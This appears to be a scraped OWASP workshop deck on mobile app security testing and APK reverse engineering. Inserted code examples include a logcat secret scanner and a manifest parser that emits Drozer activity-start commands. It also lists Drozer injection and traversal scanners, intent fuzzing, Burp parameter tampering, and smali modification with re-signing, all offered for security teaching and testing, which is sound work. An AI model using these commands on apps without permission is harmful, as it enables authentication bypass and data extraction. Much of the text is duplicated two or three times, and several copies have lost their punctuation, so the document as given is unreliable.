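    public static void main(String[] args) {
        SessionStore store = new SessionStore(Duration.ofMinutes(15)); // tune to your app
        Instant t0 = Instant.parse("2016-02-24T10:00:00Z");            // constructed timestamps
        String tok = store.login("alice", t0);
        System.out.println(store.resolve(tok, t0.plus(Duration.ofMinutes(10)))); // alice
        System.out.println(store.resolve(tok, t0.plus(Duration.ofMinutes(40)))); // null: 30 min idle
        String tok2 = store.login("alice", t0);
        String bobTok = store.switchUser(tok2, "bob", t0);
        System.out.println(store.resolve(tok2, t0));   // null: destroyed on account switch
        System.out.println(store.resolve(bobTok, t0)); // bob
    }
}
```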
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
– APKOptic
– Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
(diagram: DEX → JAR → JAVA)
Decompiling – Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
(diagram: DEX → SMALI)
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling, Luyten
Demo: Modify Smali Files
Demo
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insufficient transport layer protection - few facts from reality
- According to FireEye research from July 17, 2014, among the 1,000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
- Any sensitive data MUST be transferred over TLS
- How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage - what it is
- Simple-words definition: the OS/framework puts sensitive information in an insecure location on the device
- Important note: insecure data storage refers to the developer's conscious decision to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leaks
Unintended data leakage - common leakage points
- URL caching
- Copy/paste buffer caching
- Logging
- Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage - how to find
- Extract data from leaking content providers using Drozer:
    dz> run app.provider.finduri <package_name>
- Use logcat to verify what is being logged, via ADB:
    adb logcat [output filter]
- Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
- Use Intent Sniffer to see if any confidential data is sent via Intents
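The logcat check above, as an added example that is not part of the workshop: a filter you can pipe `adb logcat` through to flag the things an app should never log (credentials, bearer tokens, card numbers, e-mail addresses, GPS coordinates). The log lines are constructed samples; the tags and the package com.example.bank are made up. Card-like digit runs are confirmed with Luhn so that IDs and timestamps do not produce noise.

```python
"""Scan logcat (threadtime format) for sensitive data an app should never log (added example)."""
import re

# Patterns a pentester greps for first; extend per application.
PATTERNS = {
    "password": re.compile(r"(?i)\b(pass(word|wd)?|pwd|pin)\b\s*[=:]\s*\S+"),
    "bearer_token": re.compile(r"(?i)\bbearer\s+[A-Za-z0-9\-_.=]{16,}"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,19}\b"),
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "gps": re.compile(r"(?i)\b(lat|latitude)\b\s*[=:]\s*-?\d+\.\d+.*\b(lon|lng|longitude)\b\s*[=:]\s*-?\d+\.\d+"),
}

# `adb logcat -v threadtime`: date time pid tid level tag: message
LOGCAT_RE = re.compile(
    r"^(?P<date>\d\d-\d\d)\s+(?P<time>[\d:.]+)\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF])\s+(?P<tag>[^:]+?)\s*:\s?(?P<msg>.*)$"
)


def luhn_ok(digits: str) -> bool:
    """Luhn check so that random digit runs (timestamps, IDs) are not flagged as cards."""
    total, double = 0, False
    for ch in reversed(digits):
        d = int(ch)
        if double:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
        double = not double
    return total % 10 == 0


def scan_line(line: str):
    """Return (tag, kind, evidence) for every sensitive item found in one logcat line."""
    m = LOGCAT_RE.match(line)
    if not m:
        return []
    tag, msg = m.group("tag").strip(), m.group("msg")
    hits = []
    for kind, pat in PATTERNS.items():
        for found in pat.finditer(msg):
            text = found.group(0)
            if kind == "credit_card" and not luhn_ok(re.sub(r"\D", "", text)):
                continue
            hits.append((tag, kind, text.strip()))
    return hits


def scan(lines):
    return [hit for line in lines for hit in scan_line(line)]


# Constructed sample output, not captured from a real device.
SAMPLE_LOGCAT = """\
02-24 10:15:01.123  4321  4321 D LoginActivity: login attempt user=alice@example.com password=Hunter2!
02-24 10:15:01.456  4321  4350 I OkHttp  : --> GET https://api.example.com/v1/account Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.abc123def456
02-24 10:15:02.001  4321  4321 V Analytics: event=open lat=51.1079 lon=17.0385 build=20160224
02-24 10:15:02.777  4321  4321 D CardForm: saved card 4111 1111 1111 1111 exp 12/19
02-24 10:15:03.000  4321  4321 I ActivityManager: Displayed com.example.bank/.MainActivity: +312ms
"""

if __name__ == "__main__":
    for tag, kind, text in scan(SAMPLE_LOGCAT.splitlines()):
        print(f"[{kind}] {tag}: {text}")
```

On a device, feed it with `adb logcat -v threadtime | python3 logscan.py` (reading stdin instead of the sample); remember that before Android 4.1 any app holding READ_LOGS could read the same buffer, and that crash reporters ship these lines off-device.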
Unintended data leakage - demo
Unintended data leakage - mitigations
- NEVER log any sensitive information (watch what you're storing in crash logs)
- Disable the copy/paste function for sensitive parts of the application
- Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication - what it is
- Simple-words definition: if you're able to bypass authentication and/or elevate your privileges, then... your app has poor authorization and/or authentication
Poor Authorization and Authentication - how to find
- Try to bypass authentication by accessing exported activities using Drozer:
    dz> run app.activity.start --component <package_name> <component_name>
- Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
- Test the account lockout policy
- Test the password strength policy
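Before starting activities one by one with Drozer, it helps to know which components another application can reach at all. The following is an added example, not the workshop's code: it parses an AndroidManifest.xml (the decoded one apktool writes, or Drozer's `app.package.manifest` output) and lists exported components with no permission, applying Android's rules that an explicit android:exported wins, that a component with an intent-filter is exported by default, and that a provider is exported by default only when targetSdkVersion is below 17. The manifest below is constructed; com.example.bank and its component names are made up.

```python
"""Exported attack surface from an AndroidManifest.xml (added example)."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(elem, name, default=None):
    return elem.get(f"{{{ANDROID_NS}}}{name}", default)


def is_exported(component, kind, target_sdk):
    """Android's defaults: explicit android:exported wins; otherwise an intent-filter
    exports the component, and providers are exported by default below targetSdk 17."""
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if kind == "provider":
        return target_sdk < 17
    return component.find("intent-filter") is not None


def attack_surface(manifest_xml: str):
    root = ET.fromstring(manifest_xml)
    uses_sdk = root.find("uses-sdk")
    target_sdk = int(_attr(uses_sdk, "targetSdkVersion", "1")) if uses_sdk is not None else 1
    app = root.find("application")
    findings = []
    for kind in ("activity", "service", "receiver", "provider"):
        for comp in app.findall(kind):
            if not is_exported(comp, kind, target_sdk):
                continue
            perms = {p for p in (_attr(comp, "permission"), _attr(comp, "readPermission"),
                                 _attr(comp, "writePermission")) if p}
            findings.append({"kind": kind, "name": _attr(comp, "name"),
                             "permissions": sorted(perms), "authorities": _attr(comp, "authorities")})
    return {"debuggable": _attr(app, "debuggable", "false").lower() == "true", "exported": findings}


def unprotected(manifest_xml: str):
    """Exported components guarded by no permission at all: the first Drozer targets."""
    return [f["name"] for f in attack_surface(manifest_xml)["exported"] if not f["permissions"]]


# Constructed sample manifest (not from a real application).
SAMPLE_MANIFEST = f"""
<manifest xmlns:android="{ANDROID_NS}" package="com.example.bank">
  <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16"/>
  <application android:debuggable="true">
    <activity android:name=".LoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <!-- post-login screen exported through its intent-filter: reachable without logging in -->
    <activity android:name=".AccountOverviewActivity">
      <intent-filter>
        <action android:name="com.example.bank.SHOW_ACCOUNT"/>
      </intent-filter>
    </activity>
    <activity android:name=".TransferActivity" android:exported="false"/>
    <service android:name=".SyncService" android:exported="true"
             android:permission="com.example.bank.permission.SYNC"/>
    <!-- no android:exported and targetSdk 16: the provider is exported by default -->
    <provider android:name=".AccountProvider" android:authorities="com.example.bank.accounts"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for f in attack_surface(SAMPLE_MANIFEST)["exported"]:
        print(f)
    for name in unprotected(SAMPLE_MANIFEST):
        print(f"dz> run app.activity.start --component com.example.bank com.example.bank{name}")
```

Every activity in the `unprotected` list is a candidate for the authentication bypass on the slide: start it with `app.activity.start` and see whether the post-login screen renders without a session.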
Poor Authorization and Authentication - demo
Poor Authorization and Authentication - real example
- A flaw in an application can become an entry point to compromise the operating system
- For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to...
- ...stay reasonable when you're going to follow advice from the Internet...
Poor Authorization and Authentication - mitigations
- Assume that client-side authorization and authentication controls can be bypassed; they must be re-enforced on the server side whenever possible
- Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography - what it is
- Simple-words definition: using an insecure implementation, or implementing it in an insecure way
- A few reminders (yeah, I know you know it...):
  - encoding ≠ encryption
  - obfuscation ≠ encryption
Broken Cryptography - how to find
- Decompile the apk using dex2jar (or Luyten for more verbose results) and review the jar file in JD-GUI
- Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
- Try to break the encryption algorithm if the application uses custom encryption
- Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
